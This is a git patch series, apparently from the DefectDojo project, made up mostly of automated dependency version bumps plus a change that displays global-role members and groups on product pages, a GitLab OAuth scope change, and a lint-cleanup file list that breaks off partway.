version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements-lint.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements-lint.txt b/requirements-lint.txt index 0b0a585331a..d7a367aae58 100644 --- a/requirements-lint.txt +++ b/requirements-lint.txt @@ -1 +1 @@ -ruff==0.6.4 \ No newline at end of file +ruff==0.6.5 \ No newline at end of file From e2a121afd0a41c2ea87e67252229d5e9a5dacea7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:54:01 -0500 Subject: [PATCH 24/62] Bump psycopg[c] from 3.2.1 to 3.2.2 (#10910) Bumps [psycopg[c]](https://github.com/psycopg/psycopg) from 3.2.1 to 3.2.2. - [Changelog](https://github.com/psycopg/psycopg/blob/master/docs/news.rst) - [Commits](https://github.com/psycopg/psycopg/compare/3.2.1...3.2.2) --- updated-dependencies: - dependency-name: psycopg[c] dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 2178c9a2f72..d37739e58d6 100644 --- a/requirements.txt +++ b/requirements.txt @@ -31,7 +31,7 @@ lxml==5.3.0 Markdown==3.7 openpyxl==3.1.5 Pillow==10.4.0 # required by django-imagekit -psycopg[c]==3.2.1 +psycopg[c]==3.2.2 cryptography==43.0.1 python-dateutil==2.9.0.post0 pytz==2024.2 From d0985b98722c7e064e3037b4408e0f54c895a0ea Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:54:39 -0500 Subject: [PATCH 25/62] Bump asteval from 1.0.3 to 1.0.4 (#10911) Bumps [asteval](https://github.com/lmfit/asteval) from 1.0.3 to 1.0.4. - [Release notes](https://github.com/lmfit/asteval/releases) - [Commits](https://github.com/lmfit/asteval/compare/1.0.3...1.0.4) --- updated-dependencies: - dependency-name: asteval dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index d37739e58d6..a635e932993 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ # requirements.txt for DefectDojo using Python 3.x -asteval==1.0.3 +asteval==1.0.4 bleach==6.1.0 bleach[css] celery==5.4.0 From 1ba01da368a33d51fe3e7ceabeaad2d5e0547457 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:58:12 -0500 Subject: [PATCH 26/62] Bump pyyaml from 6.0.1 to 6.0.2 (#10913) Bumps [pyyaml](https://github.com/yaml/pyyaml) from 6.0.1 to 6.0.2. - [Release notes](https://github.com/yaml/pyyaml/releases) - [Changelog](https://github.com/yaml/pyyaml/blob/main/CHANGES) - [Commits](https://github.com/yaml/pyyaml/compare/6.0.1...6.0.2) --- updated-dependencies: - dependency-name: pyyaml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a635e932993..ab06124569e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -73,4 +73,4 @@ boto3==1.35.18 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 -PyYAML==6.0.1 +PyYAML==6.0.2 From d4f097d5719ac0ab53a313a61cfa2c152489ec49 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:58:46 -0500 Subject: [PATCH 27/62] Bump boto3 from 1.35.18 to 1.35.19 (#10914) Bumps [boto3](https://github.com/boto/boto3) from 1.35.18 to 1.35.19. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.18...1.35.19) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ab06124569e..11af70433da 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.18 # Required for Celery Broker AWS (SQS) support +boto3==1.35.19 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 89f3882062b70c3fa05a1a70661241102a756418 Mon Sep 17 00:00:00 2001 From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 16:16:47 -0500 Subject: [PATCH 28/62] chore(deps): update dependency postcss from 8.4.45 to v8.4.47 (docs/package.json) (#10908) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> --- docs/package-lock.json | 46 +++++++++++++++++++++--------------------- docs/package.json | 2 +- 2 files changed, 24 insertions(+), 24 deletions(-) diff --git a/docs/package-lock.json b/docs/package-lock.json index d3d81bb0ec9..93d84625c28 100644 --- a/docs/package-lock.json +++ b/docs/package-lock.json @@ -6,7 +6,7 @@ "": { "devDependencies": { "autoprefixer": "10.4.20", - "postcss": "8.4.45", + "postcss": "8.4.47", "postcss-cli": "11.0.0" } }, @@ -585,9 +585,9 @@ } }, "node_modules/picocolors": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.1.tgz", - "integrity": "sha512-anP1Z8qwhkbmu7MFP5iTt+wQKXgwzf7zTyGlcdzabySa9vd0Xt392U0rVmz9poOaBj0uHJKyyo9/upk0HrEQew==", + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.0.tgz", + "integrity": "sha512-TQ92mBOW0l3LeMeyLV6mzy/kWr8lkd/hp3mTg7wYK7zJhuBStmGMBG0BdeDZS/dZx1IukaX6Bk11zcln25o1Aw==", "dev": true }, "node_modules/picomatch": { @@ -612,9 +612,9 @@ } }, "node_modules/postcss": { - "version": "8.4.45", - "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.45.tgz", - "integrity": "sha512-7KTLTdzdZZYscUc65XmjFiB73vBhBfbPztCYdUNvlaso9PrzjzcmjqBPR0lNGkcVlcO4BjiO5rK/qNz+XAen1Q==", + "version": "8.4.47", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.47.tgz", + "integrity": "sha512-56rxCq7G/XfB4EkXq9Egn5GCqugWvDFjafDOThIdMBsI15iqPqR5r15TfSr1YPYeEI19YeaXMCbY6u88Y76GLQ==", "dev": true, "funding": [ { @@ -632,8 +632,8 @@ ], "dependencies": { "nanoid": "^3.3.7", - "picocolors": "^1.0.1", - "source-map-js": "^1.2.0" + "picocolors": "^1.1.0", + "source-map-js": "^1.2.1" }, "engines": { "node": "^10 || ^12 || >=14" @@ -834,9 +834,9 @@ } }, "node_modules/source-map-js": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", - "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", "dev": true, "engines": { "node": ">=0.10.0" @@ -1372,9 +1372,9 @@ "dev": true }, "picocolors": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.1.tgz", - "integrity": "sha512-anP1Z8qwhkbmu7MFP5iTt+wQKXgwzf7zTyGlcdzabySa9vd0Xt392U0rVmz9poOaBj0uHJKyyo9/upk0HrEQew==", + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.0.tgz", + "integrity": "sha512-TQ92mBOW0l3LeMeyLV6mzy/kWr8lkd/hp3mTg7wYK7zJhuBStmGMBG0BdeDZS/dZx1IukaX6Bk11zcln25o1Aw==", "dev": true }, "picomatch": { @@ -1390,14 +1390,14 @@ "dev": true }, "postcss": { - "version": "8.4.45", - "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.45.tgz", - "integrity": "sha512-7KTLTdzdZZYscUc65XmjFiB73vBhBfbPztCYdUNvlaso9PrzjzcmjqBPR0lNGkcVlcO4BjiO5rK/qNz+XAen1Q==", + "version": "8.4.47", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.47.tgz", + "integrity": "sha512-56rxCq7G/XfB4EkXq9Egn5GCqugWvDFjafDOThIdMBsI15iqPqR5r15TfSr1YPYeEI19YeaXMCbY6u88Y76GLQ==", "dev": true, "requires": { "nanoid": "^3.3.7", - "picocolors": "^1.0.1", - "source-map-js": "^1.2.0" + "picocolors": "^1.1.0", + "source-map-js": "^1.2.1" } }, "postcss-cli": { @@ -1504,9 +1504,9 @@ "dev": true }, "source-map-js": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", - "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", "dev": true }, "string-width": { diff --git a/docs/package.json b/docs/package.json index a892ece5668..9720854bf00 100644 --- a/docs/package.json +++ b/docs/package.json @@ -1,6 +1,6 @@ { "devDependencies": { - "postcss": "8.4.45", + "postcss": "8.4.47", "autoprefixer": "10.4.20", "postcss-cli": "11.0.0" } From a64354476b21ee4265985bee4e75c076d7ce1ea9 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Tue, 17 Sep 2024 00:07:08 +0200 Subject: [PATCH 29/62] feat(members): List global role members in Prod and ProdType (#10850) --- dojo/product/queries.py | 23 ++++++++++++++---- dojo/product/views.py | 6 +++++ dojo/product_type/queries.py | 24 +++++++++++++++---- dojo/product_type/views.py | 9 ++++++- dojo/templates/dojo/view_product_details.html | 21 ++++++++++++++-- dojo/templates/dojo/view_product_type.html | 20 ++++++++++++++-- 6 files changed, 89 insertions(+), 14 deletions(-) diff --git a/dojo/product/queries.py b/dojo/product/queries.py index 8d562c0f9a4..bf856a89888 100644 --- a/dojo/product/queries.py +++ b/dojo/product/queries.py @@ -13,6 +13,7 @@ App_Analysis, DojoMeta, Engagement_Presets, + Global_Role, Languages, Product, Product_API_Scan_Configuration, @@ -71,8 +72,15 @@ def get_authorized_members_for_product(product, permission): if user.is_superuser or user_has_permission(user, product, permission): return Product_Member.objects.filter(product=product).order_by("user__first_name", "user__last_name").select_related("role", "user") - else: - return None + return Product_Member.objects.none() + + +def get_authorized_global_members_for_product(product, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product, permission): + return Global_Role.objects.filter(group=None, role__isnull=False).order_by("user__first_name", "user__last_name").select_related("role", "user") + return Global_Role.objects.none() def get_authorized_groups_for_product(product, permission): @@ -81,8 +89,15 @@ def get_authorized_groups_for_product(product, permission): if user.is_superuser or user_has_permission(user, product, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Group.objects.filter(product=product, group__in=authorized_groups).order_by("group__name").select_related("role") - else: - return None + return Product_Group.objects.none() + + +def get_authorized_global_groups_for_product(product, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product, permission): + return Global_Role.objects.filter(user=None, role__isnull=False).order_by("group__name").select_related("role") + return Global_Role.objects.none() def get_authorized_product_members(permission): diff --git a/dojo/product/views.py b/dojo/product/views.py index e887938d450..13bcd476e50 100644 --- a/dojo/product/views.py +++ b/dojo/product/views.py @@ -92,6 +92,8 @@ Test_Type, ) from dojo.product.queries import ( + get_authorized_global_groups_for_product, + get_authorized_global_members_for_product, get_authorized_groups_for_product, get_authorized_members_for_product, get_authorized_products, @@ -213,8 +215,10 @@ def view_product(request, pid): .prefetch_related("prod_type__members") prod = get_object_or_404(prod_query, id=pid) product_members = get_authorized_members_for_product(prod, Permissions.Product_View) + global_product_members = get_authorized_global_members_for_product(prod, Permissions.Product_View) product_type_members = get_authorized_members_for_product_type(prod.prod_type, Permissions.Product_Type_View) product_groups = get_authorized_groups_for_product(prod, Permissions.Product_View) + global_product_groups = get_authorized_global_groups_for_product(prod, Permissions.Product_View) product_type_groups = get_authorized_groups_for_product_type(prod.prod_type, Permissions.Product_Type_View) personal_notifications_form = ProductNotificationsForm( instance=Notifications.objects.filter(user=request.user).filter(product=prod).first()) @@ -291,8 +295,10 @@ def view_product(request, pid): "benchmarks_percents": benchAndPercent, "benchmarks": benchmarks, "product_members": product_members, + "global_product_members": global_product_members, "product_type_members": product_type_members, "product_groups": product_groups, + "global_product_groups": global_product_groups, "product_type_groups": product_type_groups, "personal_notifications_form": personal_notifications_form, "enabled_notifications": get_enabled_notifications_list(), diff --git a/dojo/product_type/queries.py b/dojo/product_type/queries.py index 737584a5b05..dacee589146 100644 --- a/dojo/product_type/queries.py +++ b/dojo/product_type/queries.py @@ -9,7 +9,7 @@ ) from dojo.authorization.roles_permissions import Permissions from dojo.group.queries import get_authorized_groups -from dojo.models import Product_Type, Product_Type_Group, Product_Type_Member +from dojo.models import Global_Role, Product_Type, Product_Type_Group, Product_Type_Member def get_authorized_product_types(permission): @@ -45,8 +45,15 @@ def get_authorized_members_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): return Product_Type_Member.objects.filter(product_type=product_type).order_by("user__first_name", "user__last_name").select_related("role", "product_type", "user") - else: - return None + return Product_Type_Member.objects.none() + + +def get_authorized_global_members_for_product_type(product_type, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product_type, permission): + return Global_Role.objects.filter(group=None, role__isnull=False).order_by("user__first_name", "user__last_name").select_related("role", "user") + return Global_Role.objects.none() def get_authorized_groups_for_product_type(product_type, permission): @@ -55,8 +62,15 @@ def get_authorized_groups_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Type_Group.objects.filter(product_type=product_type, group__in=authorized_groups).order_by("group__name").select_related("role", "group") - else: - return None + return Product_Type_Group.objects.none() + + +def get_authorized_global_groups_for_product_type(product_type, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product_type, permission): + return Global_Role.objects.filter(user=None, role__isnull=False).order_by("group__name").select_related("role", "group") + return Global_Role.objects.none() def get_authorized_product_type_members(permission): diff --git a/dojo/product_type/views.py b/dojo/product_type/views.py index 302aa6dbbf9..2f21f81362a 100644 --- a/dojo/product_type/views.py +++ b/dojo/product_type/views.py @@ -27,6 +27,8 @@ from dojo.models import Product_Type, Product_Type_Group, Product_Type_Member, Role from dojo.product.queries import get_authorized_products from dojo.product_type.queries import ( + get_authorized_global_groups_for_product_type, + get_authorized_global_members_for_product_type, get_authorized_groups_for_product_type, get_authorized_members_for_product_type, get_authorized_product_types, @@ -117,7 +119,9 @@ def view_product_type(request, ptid): page_name = _("View Product Type") pt = get_object_or_404(Product_Type, pk=ptid) members = get_authorized_members_for_product_type(pt, Permissions.Product_Type_View) + global_members = get_authorized_global_members_for_product_type(pt, Permissions.Product_Type_View) groups = get_authorized_groups_for_product_type(pt, Permissions.Product_Type_View) + global_groups = get_authorized_global_groups_for_product_type(pt, Permissions.Product_Type_View) products = get_authorized_products(Permissions.Product_View).filter(prod_type=pt) products = get_page_items(request, products, 25) add_breadcrumb(title=page_name, top_level=False, request=request) @@ -126,7 +130,10 @@ def view_product_type(request, ptid): "pt": pt, "products": products, "groups": groups, - "members": members}) + "members": members, + "global_groups": global_groups, + "global_members": global_members, + }) @user_is_authorized(Product_Type, Permissions.Product_Type_Delete, "ptid") diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 0005dc3fbbc..ea4514d7356 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -297,7 +297,7 @@

    {% trans "Members" %}

    {% endif %} - {% if product_members or product_type_members %} + {% if product_members or product_type_members or global_product_members %}
    @@ -350,6 +350,15 @@

    {% trans "Members" %}

    {% endfor %} + {% for member in global_product_members %} + + + + + + + {% endfor %}
    {{ member.role }}
    + {{ member.user.get_full_name }}Global role{{ member.role }}
    @@ -385,7 +394,7 @@

    {% trans "Groups" %}

    {% endif %} - {% if product_groups or product_type_groups %} + {% if product_groups or product_type_groups or global_product_groups %}
    @@ -437,6 +446,14 @@

    {% trans "Groups" %}

    {% endfor %} + {% for type_group in global_product_groups %} + + + + + + + {% endfor %}
    {{ type_group.role }}
    {{ type_group.group.name }}Global role{{ type_group.role }}
    diff --git a/dojo/templates/dojo/view_product_type.html b/dojo/templates/dojo/view_product_type.html index ccb90b127b5..70e5058350a 100644 --- a/dojo/templates/dojo/view_product_type.html +++ b/dojo/templates/dojo/view_product_type.html @@ -151,7 +151,7 @@

    {% trans "Members" %}

    {% endif %} - {% if members %} + {% if members or global_members %}
    @@ -189,6 +189,14 @@

    {% trans "Members" %}

    {% endfor %} + {% for member in global_members %} + + + + + + {% endfor %}
    {{ member.role }}
    + {{ member.user.get_full_name }}{{ member.role }} (Global role)
    @@ -224,7 +232,7 @@

    {% trans "Groups" %}

    {% endif %} - {% if groups %} + {% if groups or global_groups %}
    @@ -262,6 +270,14 @@

    {% trans "Groups" %}

    {% endfor %} + {% for group in global_groups %} + + + + + + {% endfor %}
    {{ group.role }}
    + {{ group.group.name }}{{ group.role }} (Global role)
    From 644185e108a83ba5aba381c3cd182919207d6651 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:14:38 -0500 Subject: [PATCH 30/62] Bump boto3 from 1.35.19 to 1.35.20 (#10922) Bumps [boto3](https://github.com/boto/boto3) from 1.35.19 to 1.35.20. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.19...1.35.20) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 11af70433da..a1574d7db83 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.19 # Required for Celery Broker AWS (SQS) support +boto3==1.35.20 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From c2686ef49074cd40ccf1768713e9ef2779873f89 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 21:55:44 -0500 Subject: [PATCH 31/62] Bump python-gitlab from 4.10.0 to 4.11.1 (#10912) Bumps [python-gitlab](https://github.com/python-gitlab/python-gitlab) from 4.10.0 to 4.11.1. - [Release notes](https://github.com/python-gitlab/python-gitlab/releases) - [Changelog](https://github.com/python-gitlab/python-gitlab/blob/main/CHANGELOG.md) - [Commits](https://github.com/python-gitlab/python-gitlab/compare/v4.10.0...v4.11.1) --- updated-dependencies: - dependency-name: python-gitlab dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a1574d7db83..9cc328a9f01 100644 --- a/requirements.txt +++ b/requirements.txt @@ -46,7 +46,7 @@ titlecase==2.4.1 social-auth-app-django==5.4.2 social-auth-core==4.5.4 gitpython==3.1.43 -python-gitlab==4.10.0 +python-gitlab==4.11.1 cpe==1.3.0 packageurl-python==0.15.6 django-crum==0.7.9 From b92a8d097670117021e8b22622d9eb3143a43c41 Mon Sep 17 00:00:00 2001 From: Ma1tobiose <9525648+Ma1tobiose@users.noreply.github.com> Date: Tue, 17 Sep 2024 11:09:11 +0800 Subject: [PATCH 32/62] add permission for gitlab. (#10880) * Update settings.dist.py * Update .settings.dist.py.sha256sum --------- Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> --- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index f2cc3bf71a1..ef21e454a65 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -5885fb4d328a6468766c17c54ae2d906511102cd9c79d86273e85fb24c95791b +0bca5a500428482976edb590b239bbbcf365b568b15ba87bda74e8a16663866d diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index df2ed149050..6d40aeff9bb 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -139,7 +139,7 @@ DD_SOCIAL_AUTH_GITLAB_KEY=(str, ""), DD_SOCIAL_AUTH_GITLAB_SECRET=(str, ""), DD_SOCIAL_AUTH_GITLAB_API_URL=(str, "https://gitlab.com"), - DD_SOCIAL_AUTH_GITLAB_SCOPE=(list, ["read_user", "openid"]), + DD_SOCIAL_AUTH_GITLAB_SCOPE=(list, ["read_user", "openid", "read_api", "read_repository"]), DD_SOCIAL_AUTH_KEYCLOAK_OAUTH2_ENABLED=(bool, False), DD_SOCIAL_AUTH_KEYCLOAK_KEY=(str, ""), DD_SOCIAL_AUTH_KEYCLOAK_SECRET=(str, ""), From 22a0ffe702d6a0e067333a3926e5d6b13872f788 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Tue, 17 Sep 2024 17:39:47 +0200 Subject: [PATCH 33/62] Ruff: add and fix RET (#10111) * Ruff: add RET * Ruff: fix RET * move docstring --- dojo/announcement/views.py | 15 +- dojo/api_v2/mixins.py | 3 +- dojo/api_v2/permissions.py | 211 ++++++++---------- dojo/api_v2/serializers.py | 51 ++--- dojo/api_v2/views.py | 31 ++- dojo/apps.py | 3 +- dojo/authorization/authorization.py | 47 ++-- dojo/cred/queries.py | 4 +- dojo/cred/views.py | 6 +- dojo/decorators.py | 9 +- dojo/endpoint/queries.py | 8 +- dojo/endpoint/utils.py | 29 ++- dojo/endpoint/views.py | 8 +- dojo/engagement/queries.py | 4 +- dojo/engagement/views.py | 67 +++--- dojo/filters.py | 7 +- dojo/finding/queries.py | 12 +- dojo/finding/views.py | 169 +++++++------- dojo/finding_group/queries.py | 4 +- dojo/forms.py | 39 ++-- dojo/github_issue_link/views.py | 10 +- dojo/group/queries.py | 3 +- dojo/group/views.py | 28 +-- dojo/importers/auto_create_context.py | 19 +- dojo/importers/base_importer.py | 15 +- dojo/importers/default_reimporter.py | 103 ++++----- dojo/importers/endpoint_manager.py | 14 +- dojo/jira_link/helper.py | 61 +++-- dojo/jira_link/queries.py | 8 +- dojo/jira_link/views.py | 10 +- .../commands/jira_status_reconciliation.py | 3 +- dojo/metrics/utils.py | 3 +- dojo/models.py | 210 ++++++++--------- dojo/notes/views.py | 12 +- dojo/notifications/helper.py | 26 +-- dojo/notifications/views.py | 9 +- dojo/object/views.py | 17 +- dojo/pipeline.py | 28 +-- dojo/product/queries.py | 30 +-- dojo/product/views.py | 92 +++----- dojo/product_type/queries.py | 10 +- dojo/product_type/views.py | 24 +- dojo/regulations/views.py | 2 +- dojo/remote_user.py | 24 +- dojo/reports/views.py | 22 +- dojo/risk_acceptance/helper.py | 6 +- dojo/risk_acceptance/queries.py | 4 +- dojo/search/views.py | 80 +++---- dojo/sla_config/views.py | 13 +- dojo/survey/views.py | 130 +++++------ dojo/system_settings/views.py | 2 +- dojo/tags_signals.py | 1 + dojo/templatetags/display_tags.py | 43 ++-- dojo/templatetags/event_tags.py | 3 +- dojo/templatetags/get_attribute.py | 3 +- dojo/templatetags/get_banner.py | 6 +- dojo/templatetags/get_config_setting.py | 4 +- dojo/templatetags/get_endpoint_status.py | 3 +- dojo/templatetags/get_note_status.py | 1 + .../templatetags/get_notetype_availability.py | 4 +- dojo/test/queries.py | 8 +- dojo/test/views.py | 37 ++- dojo/tool_config/factory.py | 3 +- dojo/tool_product/queries.py | 4 +- dojo/tool_product/views.py | 3 +- dojo/tools/acunetix/parse_acunetix_xml.py | 15 +- dojo/tools/acunetix/parser.py | 3 +- dojo/tools/anchore_grype/parser.py | 8 +- dojo/tools/api_blackduck/api_client.py | 2 + dojo/tools/api_bugcrowd/api_client.py | 16 +- dojo/tools/api_bugcrowd/parser.py | 22 +- dojo/tools/api_cobalt/api_client.py | 35 ++- dojo/tools/api_cobalt/importer.py | 3 +- dojo/tools/api_cobalt/parser.py | 14 +- dojo/tools/api_edgescan/api_client.py | 5 +- dojo/tools/api_edgescan/importer.py | 3 +- dojo/tools/api_sonarqube/importer.py | 17 +- dojo/tools/api_sonarqube/updater.py | 6 +- dojo/tools/api_vulners/importer.py | 6 +- dojo/tools/appspider/parser.py | 2 +- dojo/tools/aqua/parser.py | 16 +- dojo/tools/asff/parser.py | 11 +- dojo/tools/auditjs/parser.py | 9 +- dojo/tools/aws_prowler/parser.py | 17 +- dojo/tools/aws_prowler_v3plus/parser.py | 7 +- .../parser.py | 5 +- dojo/tools/bandit/parser.py | 7 +- dojo/tools/bearer_cli/parser.py | 3 +- dojo/tools/blackduck/importer.py | 3 +- dojo/tools/blackduck/parser.py | 3 +- .../tools/blackduck_binary_analysis/parser.py | 7 +- .../blackduck_component_risk/importer.py | 5 +- dojo/tools/blackduck_component_risk/parser.py | 6 +- dojo/tools/burp_api/parser.py | 7 +- dojo/tools/burp_enterprise/parser.py | 6 +- dojo/tools/burp_graphql/parser.py | 3 +- dojo/tools/checkmarx/parser.py | 14 +- dojo/tools/checkmarx_one/parser.py | 16 +- dojo/tools/chefinspect/parser.py | 9 +- dojo/tools/clair/clairklar_parser.py | 3 +- dojo/tools/clair/parser.py | 6 +- dojo/tools/cloudsploit/parser.py | 3 +- dojo/tools/codechecker/parser.py | 7 +- dojo/tools/contrast/parser.py | 3 +- dojo/tools/crashtest_security/parser.py | 19 +- dojo/tools/crunch42/parser.py | 6 +- dojo/tools/cyclonedx/json_parser.py | 2 +- dojo/tools/cyclonedx/parser.py | 3 +- .../deepfence_threatmapper/compliance.py | 3 +- dojo/tools/deepfence_threatmapper/malware.py | 6 +- dojo/tools/deepfence_threatmapper/secret.py | 3 +- .../deepfence_threatmapper/vulnerability.py | 6 +- dojo/tools/dependency_check/parser.py | 11 +- dojo/tools/dependency_track/parser.py | 11 +- dojo/tools/dockerbench/parser.py | 4 +- dojo/tools/drheader/parser.py | 7 +- dojo/tools/eslint/parser.py | 5 +- dojo/tools/fortify/parser.py | 7 +- dojo/tools/generic/csv_parser.py | 3 +- dojo/tools/generic/parser.py | 6 +- dojo/tools/github_vulnerability/parser.py | 6 +- dojo/tools/gitlab_dep_scan/parser.py | 3 +- dojo/tools/gitlab_sast/parser.py | 3 +- dojo/tools/harbor_vulnerability/parser.py | 3 +- dojo/tools/hcl_appscan/parser.py | 3 +- dojo/tools/huskyci/parser.py | 7 +- dojo/tools/hydra/parser.py | 4 +- dojo/tools/intsights/parser.py | 3 +- .../parser.py | 6 +- dojo/tools/kubebench/parser.py | 7 +- dojo/tools/kubescape/parser.py | 7 +- dojo/tools/microfocus_webinspect/parser.py | 14 +- dojo/tools/mobsf/parser.py | 3 +- dojo/tools/mobsfscan/parser.py | 93 ++++---- dojo/tools/mozilla_observatory/parser.py | 7 +- dojo/tools/ms_defender/parser.py | 48 ++-- dojo/tools/neuvector/parser.py | 16 +- dojo/tools/neuvector_compliance/parser.py | 22 +- dojo/tools/nikto/parser.py | 7 +- dojo/tools/nmap/parser.py | 9 +- dojo/tools/noseyparker/parser.py | 4 +- dojo/tools/npm_audit/parser.py | 6 +- dojo/tools/npm_audit_7_plus/parser.py | 2 +- dojo/tools/nsp/parser.py | 7 +- dojo/tools/nuclei/parser.py | 2 +- dojo/tools/openvas/csv_parser.py | 5 +- dojo/tools/openvas/parser.py | 3 +- dojo/tools/openvas/xml_parser.py | 9 +- dojo/tools/ort/parser.py | 33 ++- dojo/tools/ossindex_devaudit/parser.py | 7 +- 